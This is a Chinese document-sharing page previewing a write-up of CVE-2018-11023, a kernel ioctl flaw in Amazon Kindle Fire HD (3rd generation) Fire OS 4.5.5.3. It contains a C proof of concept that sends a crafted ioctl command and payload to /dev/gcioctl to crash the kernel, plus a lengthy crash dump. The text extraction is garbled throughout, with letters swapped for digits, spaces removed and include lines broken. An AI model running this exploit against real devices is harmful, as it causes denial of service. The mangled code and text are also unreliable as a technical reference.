（CVE-2018-11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人：lao****ou

文档编号：794870

上传时间：2024-05-25

格式：DOCX

页数：7

大小：34.23KB

《（CVE-2018-11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2018-11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx（7页珍藏版）》请在第一文库网上搜索。

1、(CVE-2018-11023)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3的内核组件中的内核模块omapdriversmiscgcxgcioct1gcif.c允许攻击者通过设备/dev上ioct1的参数注入特制参数/gcioct1使用命令3222560159,并导致内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevgci

2、oct1causesthesystemcrashviaIOCT13222560159.* ThisPocshou1drunwithpermissiontodoioct1ondevgcioct1.*/#inc1ude#inc1ude#inc1ude#inc1udeconststaticchar*driver=,devgcioct1;staticcommand=3222560159;intmain(intargcjchar*argv,char*env)unsignedintpay1oad=0x244085aa,01a03e6ef0x000003f4,0x00000000;intfd=0;fd=OP

3、en(driver,O_RDON1Y);if(fddata1oca1tmp1og);return-1;printf(Tryopen%swithcommand0x%x.n”,driver,command);printf(Systemwi11crashandreboot.n);if(ioct1(fdcommand,Spay1oad)data1oca1tmp1og);return-1;c1ose(fd);return0;崩溃日志79.825592init:untrackedpid3232exited79.830841init:untrackedpid3234exited95.970855A1ignm

4、enttrap:nothand1inginstructione1953f9fatf395.978912Unhand1edfau1t:a1ignmentexception(0001)at0x1a03e695.986053Interna1error:1#1PREEMPTSMPARM95.991638Modu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogger(0)1)95.999145CPU:0Tainted:GO(3.4.83-gd2afc0bae69#96.006408PCisat_raw_spin_1ock_irqsave+0x38/0xb096.01211

5、51Risat_raw_spin_1ock_irqsave+0x10/0x1496.017791pc:1r:psr:2000009396.017822sp:d02bfdd8ip:d02bfdf8fp:d02bfdf496.030578r10:00000000r9:dd3eeca8r8:000000010096.036376r7:Ia03e6efr6:00000001r5:Ia03e6f3r4:d02be01396.043701r3:00000001r2:00000001r1:00000082r0:20000096.050933F1ags:nzCvIRQsoffFIQsonModeSVC_32I

6、SAARMSegmentuser96.058990Contro1:10c5387dTab1e:96cb804aDAC:0000001596.06546096.065460PC:0xc06a4d08:96.0704044d081a000003eaffffe6e5903000e35300000affffe3e5903004e3530000996.0808104d28eaffffdfe50b0018ebfffbabe51b0018eaffffede1a0c00de92dd800e24cb00496.0912174d48ebffffcfe89da800e1a0c00de92dd878e24cb004e

7、1a0300de3c34d7fe3c4403f96.1017764d68e1a05000e3a06001e5943004e2833001e5843004e10f0000f10c0080e1953f9f96.1123354d88e333000001853f96e35300000a000014e121f000e5943004e2433001e584300496.1228944da8e5943000e31300021a000010e5953004e3530000e595300005856004e353000096.1333614dc81a000003eaffffe7e5953000e35300000

8、affffe4e5953004e3530000Iafffff996.1439204de8eaffffe0f57ff05fe5853004e89da878ebfffb79eaffffeee1a0c00de92dd80096.15447996.1544791R:0xc06a4d90:96.1593934d90e35300000a000014e121f000e5943004e2433001e5843004e5943000e313000296.1700134db01a000010e5953004e3530000e595300005856004e35300001a000003eaffffe796.180

9、6034dd0e5953000e35300000affffe4e5953004e3530000Iafffff9eaffffe0f57ff05f96.1910704df0e5853004e89da878ebfffb79eaffffece1a0c00de92dd800e24cb004ebffffcf96.2016904e10e89da800e1a0c00de92dd800e24cb004ebfffff6e89da800e1a0c00de92dd80096.2123414e30e24cb004ebfffff1e89da800e1a0c00de92dd818e24cb004ebffffc0e1a040

10、0096.2228084e50ebe6a978e121f004e89da818e1a0c00de92dd800e24cb004ebfffff3e89da80096.2336124e70e1a0c00de92dd830e24cb004e24dd008e1a0300de3c34d7fe3c4403fe3a0500196.24426296.244262SP:0xd02bfd58:96.249145fd58000000000000001d00000004d4736f80d4737394C06a4d8420000093ffffffff96.259948fd78d02bfdc400000001d02bfd

11、f4d02bfd90C06a5318C0008370200000130000008296.270660fd980000000100000001d02be000Ia03e6f3000000011a03e6ef00000001dd3eeca896.281311fdb800000000d02bfdf4d02bfdf8d02bfdd8C06a4e10C06a4d8820000093ffffffff96.292053fdd80000020a00000082Ia03e6f3d02be000d02bfe04d02bfdf8C06a4e10C06a4d5c96.302825fdf8d02bfe14d02bfe

12、08C06a4e24C06a4e0cd02bfe5cd02bfe18C06a3008C06a4e2096.313415fe18d84a38d8d84a2800d84a38000000000ad02be000c33a3180d02bfe54Ia03e6ef96.323883fe38bed24608d02b000d627f000bed24608dd3eeca800000000d02bfe6cd02bfe6096.33453396.334533IP:0d02bfd78:96.339416fd78d02bfdc400000001d02bfdf4d02bfd90C06a5318C000837020000

13、0130000008296.349853fd980000000100000001d02be000Ia03e6f3000000011a03e6ef00000001dd3eeca896.360290fdb800000000d02bfdf4d02bfdf8d02bfdd8C06a4e10C06a4d8820000093ffffffff96.370727fdd80000020a00000082Ia03e6f3d02be000d02bfe04d02bfdf8C06a4e10C06a4d5c96.381042fdf8d02bfe14d02bfe08C06a4e24C06a4e0cd02bfe5cd02bf

14、e18C06a3008C06a4e2096.391479fe18d84a38d8d84a2800d84a38000000000ad02be000c33a3180d02bfe54Ia03e6ef96.402008fe38bed24608d02be000d627f000bed24608dd3eeca800000000d02bfe6cd02bfe6096.412445fe58C06a319cc06a2fecd02bff04d02bfe70C0317c28c06a3194000000010000002896.42279096.422790FP:0xd02bfd74:96.427795fd74ffffffffd02bfdc400000001d02bfdf4d

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

3 金币 0人已下载

下载	加入VIP,免费下载

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: CVE-2018-11023Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11023 Amazon rd kernel 组件安全漏洞

第一文库网所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

关于本文

本文标题：（CVE-2018-11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
链接地址：https://www.001doc.com/doc/794870.html